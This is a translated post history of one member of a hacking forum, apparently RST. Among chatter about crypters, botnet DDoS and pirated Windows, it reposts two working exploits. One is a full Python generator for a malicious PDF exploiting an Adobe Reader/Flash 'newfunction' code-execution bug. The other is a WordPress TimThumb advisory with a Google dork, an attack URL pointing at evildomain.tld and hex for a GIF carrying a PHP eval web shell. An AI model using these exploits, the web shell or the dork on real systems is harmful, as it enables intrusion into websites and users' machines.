Gabriel87

Active Members
  • Posts

    860
Everything posted by Gabriel87

  1. Gabriel87

    Well done

    Format C: and you're rid of the virus
  2. File Info
     Report date: 2011-08-16 19:42:29 (GMT 1)
     File name: lfi-scanner-exe
     File size: 693248 bytes
     MD5 Hash: d422ea86a771ef02af7fea1c87ca1422
     SHA1 Hash: 6dc2254533f11f2b9421a28efddb00928f1d0f54
     Detection rate: 0 on 5 (0%)
     Status: CLEAN
     Detections
     AVG -
     Avira AntiVir -
     ClamAV -
     Emsisoft -
     TrendMicro -
     Scan report generated by NoVirusThanks.org

     It's clean
  3. Is it clean? Has anyone checked it? Edit: OK, thanks gigaevil, it works perfectly
  4. @FearDotCom, no offense, I have nothing against you, but what do you call yourself then? http://rstcenter.com/forum/34726-feardotcom-aka-smenaru4u-baiatul-bagat-frica-userii-rst.rst
  5. I need that script too, because scanning doesn't work for me either since I have internet through RDS... and nedo's tutorial has been deleted from the forum
  6. I agree with this idea too; the RST forum will be different after that
  7. '''
       __  __  ____         _    _ ____
      |  \/  |/ __ \   /\  | |  | |  _ \
      | \  / | |  | | /  \ | |  | | |_) |
      | |\/| | |  | |/ /\ \| |  | |  _ <
      | |  | | |__| / ____ \ |__| | |_) |
      |_|  |_|\____/_/    \_\____/|____/

     http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
     http://www.exploit.db.com/sploits/moaub-23-exploit.zip
     '''

     '''
       Title         : Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability
       Version       : Adobe Reader 9.3.2
       Analysis      : http://www.abysssec.com
       Vendor        : http://www.adobe.com
       Impact        : Critical
       Contact       : shahin [at] abysssec.com , info [at] abysssec.com
       Twitter       : @abysssec
       CVE           : CVE-2010-2168
       MOAUB Number  : MOAUB-06
     '''

     import sys

     class PDF:

         def __init__(self):
             self.xrefs = []
             self.eol = '\x0a'
             self.content = ''
             self.xrefs_offset = 0

         def header(self):
             self.content += '%PDF-1.6' + self.eol

         def obj(self, obj_num, data,flag):
             self.xrefs.append(len(self.content))
             self.content += '%d 0 obj' % obj_num
             if flag == 1:
                 self.content += self.eol + '<< ' + data + ' >>' + self.eol
             else:
                 self.content += self.eol + data + self.eol
             self.content += 'endobj' + self.eol

         def obj_SWFStream(self, obj_num, data, stream):
             self.xrefs.append(len(self.content))
             self.content += '%d 0 obj' % obj_num
             self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))
             self.content += ' >>' + self.eol
             self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
             self.content += 'endobj' + self.eol

         def obj_Stream(self, obj_num, data, stream):
             self.xrefs.append(len(self.content))
             self.content += '%d 0 obj' % obj_num
             self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)
             self.content += ' >>' + self.eol
             self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
             self.content += 'endobj' + self.eol

         def ref(self, ref_num):
             return '%d 0 R' % ref_num

         def xref(self):
             self.xrefs_offset = len(self.content)
             self.content += 'xref' + self.eol
             self.content += '0 %d' % (len(self.xrefs) + 1)
             self.content += self.eol
             self.content += '0000000000 65535 f' + self.eol
             for i in self.xrefs:
                 self.content += '%010d 00000 n' % i
                 self.content += self.eol

         def trailer(self):
             self.content += 'trailer' + self.eol
             self.content += '<< /Size %d' % (len(self.xrefs) + 1)
             self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
             self.content += 'startxref' + self.eol
             self.content += '%d' % self.xrefs_offset
             self.content += self.eol
             self.content += '%%EOF'

         def generate(self):
             return self.content

     class POC:

         def getSWF(self):
             try:
                 fdR = open('flash.swf', 'rb+')
                 strTotal = fdR.read()
                 str1 = strTotal[:3673]
                 command = '\x40\xE8\xD4\xF1\xFF\x33' #newfunction
                 str2 = strTotal[3679:]
                 fdW= open('poc.swf', 'wb+')
                 finalStr = str1+command+str2
                 fdW.write(finalStr)
                 fdR.close()
                 return finalStr
             except IOError:
                 print '[*] Error : An IO error has occurred'

     def generate_pdf():
         poc = POC()
         swfFile = 'poc.swf'
         pdf = PDF()
         pdf.header()
         pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)
         pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)
         pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)
         pdf.obj_Stream(4, '','')
         pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)
         pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1)
         pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)
         pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)
         pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)
         pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)
         pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)
         pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)
         pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)
         pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',poc.getSWF() )
         pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)
         pdf.obj_Stream(16, '<</Length 0 >> ','')
         pdf.xref()
         pdf.trailer()
         return pdf.generate()

     def main():
         if len(sys.argv) != 2:
             print 'Usage: python %s [output file name]' % sys.argv[0]
             sys.exit(0)

         file_name = sys.argv[1]
         if not file_name.endswith('.pdf'):
             file_name = file_name + '.pdf'

         try:
             fd = open(file_name, 'wb+')
             fd.write(generate_pdf())
             fd.close()
             print '[-] PDF file generated and written to %s' % file_name
         except IOError:
             print '[*] Error : An IO error has occurred'
             print '[-] Exiting ...'
             sys.exit(-1)

     if __name__ == '__main__':
         main()

     Source: MOAUB #23 - Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability
  8. # Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
     # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
     # Date: 3rd August 2011
     # Author: MaXe
     # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
     # Version: 1.32
     # Screenshot: See attachment
     # Tested on: Windows XP + Apache + PHP (XAMPP)

     WordPress TimThumb (Theme) Plugin - Remote Code Execution

     Versions Affected:
     1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
     (Version 1.33 did not save the cache file as .php)

     Info: (See references for original advisory)
     TimThumb is an image resizing utility, widely used in many WordPress themes.

     External Links:
     http://www.binarymoon.co.uk/projects/timthumb/
     http://code.google.com/p/timthumb/

     Credits:
     - Mark Maunder (Original Researcher)
     - MaXe (Independent Proof of Concept Writer)

     -:: The Advisory ::-
     TimThumb is prone to a Remote Code Execution vulnerability, because the script
     does not check remotely cached files properly. By crafting a special image file
     with a valid MIME-type, and appending a PHP file at the end of this, it is
     possible to fool TimThumb into believing that it is a legitimate image, thus
     caching it locally in the cache directory.

     Attack URL: (Note! Some websites use Base64 Encoding of the src GET-request.)
     http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

     Stored file on the Target: (This can change from host to host.)
     1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
     1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
     md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

     Proof of Concept File:
     \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
     \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
     \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
     \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
     \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
     \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
     (Transparent GIF + <?php @eval($_GET['cmd']) ?>)

     -:: Solution ::-
     Update to the latest version 1.34 or delete the timthumb file.

     NOTE: This file is often renamed and you should therefore issue
     a command like this in a terminal: (Thanks to rAWjAW for this info.)
     find . | grep php | xargs grep -s timthumb

     Disclosure Information:
     - Vulnerability Disclosed (Mark Maunder): 1st August 2011
     - Vulnerability Researched (MaXe): 2nd August 2011
     - Disclosed at The Exploit Database: 3rd August 2011

     References:
     http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
     http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
     http://code.google.com/p/timthumb/issues/detail?id=212
     http://programming.arantius.com/the+smallest+possible+gif

     Source: Exploits Database by Offensive Security
  9. The site isn't vulnerable, that's why it didn't find anything for you
  10. Cartus, when I'm free too and not working, I don't see you online so we can do that
  11. Relax, they don't use something like "LOIC" for DDoS or DoS, and I don't even think they use the DDoS method; and if they do, they have a big enough botnet, they don't hit with free programs off the net. I'm telling you, you heard wrong
  12. For Romanians Fly-Crypter was 8 euros, so I think this one will be the same for Romanians
  13. Well then you make yourself bots in a botnet on IRC and DDoS from the botnet; you don't make 500-600 bots and hit with this
  14. @Exc3lent, do you see how old the post is? "12-15-2009", and you've only now woken up to say the download link doesn't work
  15. cristi_ro: how do I power the laptop? straight from the socket?
      PAPU: yes
      PAPU: cut the plug off the transformer, strip the wires and stick them in the socket
      cristi_ro: but it says 12 volts here
      PAPU: that's nonsense, man, if you plug it straight into the socket it runs faster
      cristi_ro: k
      cristi_ro: wait
      PAPU: duuuuuuuuuuuuuuuuuuuuuuuuude I was joking, you idiot, don't plug it in
      PAPU: duuuuuuuuuuuuuuuuuuuuuuuuude I was joking, you idiot, don't plug it in
      cristi_ro: DUUUUUUUUUUUUUUUUUUDE SMOKE CAME OUT OF IT, WHAT THE HELL DID YOU DO TO ME
      cristi_ro: DUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUDE
      cristi_ro: DUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUDE
      cristi_ro: you moron, it wasn't mine, you idiot, what the hell do I do now, it's all black
      PAPU: ahhahahahahahahahhhhhhhhhhhhhhahahahahahahahahhaha

      killthemf: this is how I do your mom
      killthemf: http://i46.tinypic.com/117tqub.jpg
      Diriga: whaaaaaaaaaaat???????
      killthemf: oh, damn ...
      Diriga: what does that mean?
      killthemf: ma'am, sorry, I didn't mean to show it to you
      Diriga: you get a 1 for conduct, 1 !!!!!!!!!!!!!!!!!!!!!
      killthemf: sorry ma'am, that's how it goes on mess, I wanted to show Marius how things stand between me and his mother
      Diriga: ok, I'm calling her now to tell her !!!!!
      killthemf: give me her number too
      Diriga: you shameless brat !!!
      killthemf: hahahahha =))
  16. Windows XP SP2 (I use it on VirtualBox) = pirated; Windows 7 32bit = pirated
  17. @sandbot, open it in VirtualBox
  18. The script works very well if you have a lot of bandwidth; if you don't, as I've said before, you go down faster than the victim, so if you don't have enough bandwidth there's no point in hitting with it
  19. Screenshots get deleted from tinypic after a while, but I talked to BUNNN a few days ago and he told me it'll be ready in 2 days